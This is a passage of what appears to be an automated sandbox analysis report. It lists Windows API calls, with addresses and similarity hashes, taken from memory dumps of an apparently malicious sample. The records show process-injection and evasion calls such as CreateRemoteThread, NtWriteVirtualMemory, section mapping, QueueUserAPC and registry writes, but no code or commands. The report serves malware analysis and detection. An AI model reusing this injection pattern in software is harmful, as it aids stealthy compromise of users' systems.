                                                                                  • CreateFileA.KERNEL32 ref: 04DD02A9
                                                                                  • SetFilePointer.KERNEL32 ref: 04DD02C3
                                                                                  • ReadFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04DAC808), ref: 04DD02E5
                                                                                  • FindCloseChangeNotification.KERNEL32 ref: 04DD0300
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                                                                                  • String ID:
                                                                                  • API String ID: 2405668454-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 04DC3A14: RegCreateKeyA.ADVAPI32 ref: 04DC3A37
                                                                                  • RegQueryValueExA.KERNEL32 ref: 04DCEC71
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueryValue
                                                                                  • String ID: ($(
                                                                                  • API String ID: 2711935003-222463766
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 04DB7500: FindFirstFileW.KERNEL32 ref: 04DB760A
                                                                                  • RegOpenKeyA.ADVAPI32 ref: 04DBCC5B
                                                                                  • RegSetValueExA.KERNEL32 ref: 04DBCC8F
                                                                                  • RegCloseKey.KERNEL32 ref: 04DBCC9D
                                                                                    • Part of subcall function 04DBB424: CreateFileW.KERNEL32 ref: 04DBB45D
                                                                                    • Part of subcall function 04DAD104: CreateFileW.KERNEL32 ref: 04DAD163
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: File$Create$CloseFindFirstOpenValue
                                                                                  • String ID:
                                                                                  • API String ID: 3325113042-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: H
                                                                                  • API String ID: 1029625771-2852464175
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 04DC3A14: RegCreateKeyA.ADVAPI32 ref: 04DC3A37
                                                                                  • RegSetValueExA.KERNEL32 ref: 04DB4BDD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateValue
                                                                                  • String ID: (
                                                                                  • API String ID: 2259555733-3887548279
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegOpenKeyA.ADVAPI32 ref: 04DA28EC
                                                                                    • Part of subcall function 04DC87A8: RegQueryValueExW.KERNEL32 ref: 04DC87E8
                                                                                  • CreateFileW.KERNEL32 ref: 04DA2AF1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateFileOpenQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 2015307909-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 04DAD7E0: VirtualProtect.KERNEL32 ref: 04DAD813
                                                                                  • VirtualProtect.KERNEL32 ref: 04DBBDC2
                                                                                  • VirtualProtect.KERNEL32 ref: 04DBBDE5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ConnectNamedPipe
                                                                                  • String ID:
                                                                                  • API String ID: 2191148154-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateFileMappingW.KERNELBASE ref: 04DCB705
                                                                                  • MapViewOfFile.KERNELBASE ref: 04DCB731
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: File$CreateMappingView
                                                                                  • String ID:
                                                                                  • API String ID: 3452162329-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ClassCreateRegisterWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3469048531-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • ReadFile.KERNEL32 ref: 04DB2E7A
                                                                                  • FindCloseChangeNotification.KERNEL32 ref: 04DB2EF4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ChangeCloseFileFindNotificationRead
                                                                                  • String ID:
                                                                                  • API String ID: 1200561807-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: File$CreateRead
                                                                                  • String ID:
                                                                                  • API String ID: 3388366904-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3356406503-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 04DC3A14: RegCreateKeyA.ADVAPI32 ref: 04DC3A37
                                                                                  • RegSetValueExA.KERNEL32 ref: 04DBA809
                                                                                  • RegCloseKey.KERNEL32 ref: 04DBA81E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CloseCreateValue
                                                                                  • String ID:
                                                                                  • API String ID: 1818849710-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateOpen
                                                                                  • String ID:
                                                                                  • API String ID: 436179556-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueueThreadUser
                                                                                  • String ID:
                                                                                  • API String ID: 3600083758-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID:
                                                                                  • API String ID: 3702945584-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlAddVectoredContinueHandler.NTDLL ref: 04DB94C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ContinueHandlerVectored
                                                                                  • String ID:
                                                                                  • API String ID: 3758255415-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell
                                                                                  • String ID:
                                                                                  • API String ID: 587946157-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CallNamedPipe
                                                                                  • String ID:
                                                                                  • API String ID: 1741058652-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: gethostbyname
                                                                                  • String ID:
                                                                                  • API String ID: 930432418-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: TimerWaitable
                                                                                  • String ID:
                                                                                  • API String ID: 1823812067-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlDeleteBoundaryDescriptor.NTDLL ref: 04DC6363
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: BoundaryDeleteDescriptor
                                                                                  • String ID:
                                                                                  • API String ID: 3203483114-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlDeleteBoundaryDescriptor.NTDLL ref: 04DAA876
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: BoundaryDeleteDescriptor
                                                                                  • String ID:
                                                                                  • API String ID: 3203483114-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FindCloseChangeNotification.KERNEL32 ref: 04DA8754
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ChangeCloseFindNotification
                                                                                  • String ID:
                                                                                  • API String ID: 2591292051-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetTempFileNameA.KERNEL32(?,?,?,?,?,?,000003EE,04DCD3FF), ref: 04DCE68B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: FileNameTemp
                                                                                  • String ID:
                                                                                  • API String ID: 745986568-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateDirectory
                                                                                  • String ID:
                                                                                  • API String ID: 4241100979-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 04DC3A14: RegCreateKeyA.ADVAPI32 ref: 04DC3A37
                                                                                  • RegQueryValueExA.KERNEL32 ref: 04DB678A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 2711935003-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetWaitableTimer.KERNEL32 ref: 04DC2AB1
                                                                                    • Part of subcall function 04DBA7AC: RegSetValueExA.KERNEL32 ref: 04DBA809
                                                                                    • Part of subcall function 04DBA7AC: RegCloseKey.KERNEL32 ref: 04DBA81E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CloseTimerValueWaitable
                                                                                  • String ID:
                                                                                  • API String ID: 1352355977-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 04DCC130: NtWriteVirtualMemory.NTDLL ref: 04DCC14F
                                                                                  • VirtualProtectEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04DAAD00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Virtual$MemoryProtectWrite
                                                                                  • String ID:
                                                                                  • API String ID: 1789425917-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(?,?,?,?,00000003,-00000001,-00000004,04DBC88A), ref: 04DB37AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FindCloseChangeNotification.KERNEL32 ref: 04DCD0F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ChangeCloseFindNotification
                                                                                  • String ID:
                                                                                  • API String ID: 2591292051-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateMutex
                                                                                  • String ID:
                                                                                  • API String ID: 1964310414-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ExitThreadUser
                                                                                  • String ID:
                                                                                  • API String ID: 3424019298-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ExitThreadUser
                                                                                  • String ID:
                                                                                  • API String ID: 3424019298-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: FreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1263568516-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Executed Functions

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID: @
                                                                                  • API String ID: 1279760036-2766056989
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: InformationQueryToken$Close
                                                                                  • String ID: 0
                                                                                  • API String ID: 459398573-4108050209
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtSetInformationProcess.NTDLL ref: 00DB2CA2
                                                                                  • CreateRemoteThread.KERNELBASE ref: 00DB2D52
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateInformationProcessRemoteThread
                                                                                  • String ID:
                                                                                  • API String ID: 3020566308-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Virtual$AllocCreateFreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 2341667014-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateMutexExA.KERNEL32 ref: 00DB595B
                                                                                  • GetUserNameA.ADVAPI32 ref: 00DB5BEC
                                                                                    • Part of subcall function 00DBFAD4: CreateThread.KERNELBASE ref: 00DBFB04
                                                                                    • Part of subcall function 00DBFAD4: QueueUserAPC.KERNELBASE ref: 00DBFB1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateUser$MutexNameQueueThread
                                                                                  • String ID:
                                                                                  • API String ID: 2503873790-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtCreateSection.NTDLL ref: 00DC208E
                                                                                    • Part of subcall function 00DBEF14: NtMapViewOfSection.NTDLL ref: 00DBEF60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Section$CreateView
                                                                                  • String ID: 0
                                                                                  • API String ID: 1585966358-4108050209
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL ref: 00DCF9E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID: @
                                                                                  • API String ID: 2167126740-2766056989
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtProtectVirtualMemory.NTDLL ref: 00DE127A
                                                                                  • NtProtectVirtualMemory.NTDLL ref: 00DE1309
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847475847.0000000000DE1000.00000040.00000001.sdmp, Offset: 00DE1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: MemoryProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2706961497-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtQueryInformationProcess.NTDLL ref: 00DB1B11
                                                                                    • Part of subcall function 00DC9584: NtReadVirtualMemory.NTDLL ref: 00DC95A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1498878907-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtQueryInformationProcess.NTDLL ref: 00DC9B72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: InformationProcessQuery
                                                                                  • String ID:
                                                                                  • API String ID: 1778838933-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: SectionView
                                                                                  • String ID:
                                                                                  • API String ID: 1323581903-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: MemoryReadVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2834387570-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtWriteVirtualMemory.NTDLL ref: 00DCC14F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: MemoryVirtualWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3527976591-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectThreadVirtual$ResumeSuspend
                                                                                  • String ID:
                                                                                  • API String ID: 3483329683-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE ref: 00DD02A9
                                                                                  • SetFilePointer.KERNELBASE ref: 00DD02C3
                                                                                  • ReadFile.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DAC808), ref: 00DD02E5
                                                                                  • FindCloseChangeNotification.KERNELBASE ref: 00DD0300
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                                                                                  • String ID:
                                                                                  • API String ID: 2405668454-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00DC3A14: RegCreateKeyA.ADVAPI32 ref: 00DC3A37
                                                                                  • RegQueryValueExA.KERNELBASE ref: 00DCEC71
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueryValue
                                                                                  • String ID: ($(
                                                                                  • API String ID: 2711935003-222463766
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: H
                                                                                  • API String ID: 1029625771-2852464175
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00DAD7E0: VirtualProtect.KERNELBASE ref: 00DAD813
                                                                                  • VirtualProtect.KERNELBASE ref: 00DBBDC2
                                                                                  • VirtualProtect.KERNELBASE ref: 00DBBDE5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • StrRChrA.KERNELBASE ref: 00DB93CE
                                                                                  • RtlAddVectoredContinueHandler.NTDLL ref: 00DB94C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ContinueHandlerVectored
                                                                                  • String ID:
                                                                                  • API String ID: 3758255415-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
